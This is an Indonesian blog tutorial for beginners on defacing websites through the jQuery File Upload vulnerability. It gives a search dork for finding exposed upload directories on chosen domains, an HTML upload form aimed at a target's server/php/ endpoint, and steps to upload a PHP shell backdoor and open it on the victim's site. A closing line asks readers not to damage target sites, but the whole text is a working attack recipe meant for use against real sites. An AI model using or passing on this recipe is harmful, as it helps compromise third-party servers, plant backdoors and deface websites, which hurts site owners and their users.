Tutorial Deface Poc Jquery File Upload/File Array, Untuk Pemula

Ditutorial kali ini aku akan membahas wacana suatu metode deface yakni Jquery File Upload, mungkin di Blog lain sudah banyak yang membahas wacana tutorial ini tapi tak apalah aku ikut share buat nambah-nambah artikel diblog ini hehe.

Tak perlu dijelaskan panjang lebar lagi apa itu Deface, alasannya kalian niscaya sudah tau percuma kalo aku tulis juga pengertiannya toh juga gak bakal dibaca yakan? :v. Oke pribadi saja ke tutorialnya..

Cara deface dengan Jquery File Upload dan tanem shell backdoor

Apa saja yang harus kita sediakan terlebih dahulu? Seperti biasa kita yakni shell backdoor, dork, hp/pc kopi, rokok, CSRFdan koneksi internet tentunya :v .

Dork:

Inurl:/server/php/files/

Tambahkan site:.com/net/org/il/jp atau terserah agar dapet yang masih mulus :v.

CSRF:

<form method=”POST” action=”http://targetlu.co.li/../server/php/”enctype=”multipart/form-data”><inputtype=”file”name=”files[]”><button>Upload</button>

Oke kini Dorking dulu tod….

Ø Kalo udah dapet targetnya tinggal dipastekan di CSRF simpan dengan format .html kemudian buka.

Ø Disitu tinggal lu upload shell kesayanganlu.

Ø Kalo shell berhasil di upload akan ada goresan pena {“files”:[{“name”:”NamaShell.php..bla..bla..bla.

Ø Kemudian kanal shell yang tadi di http://target/…/server/php/files/namashell.php

Itulah tutorial deface teknik Jquery File Upload, buat kalian yang hoby deface mohon jangan rusak web sasaran lu, kasian kali admin web tersebut, sepakat sekian thanks.

Sumber https://alphra87.blogspot.com/

Bagikan Artikel ini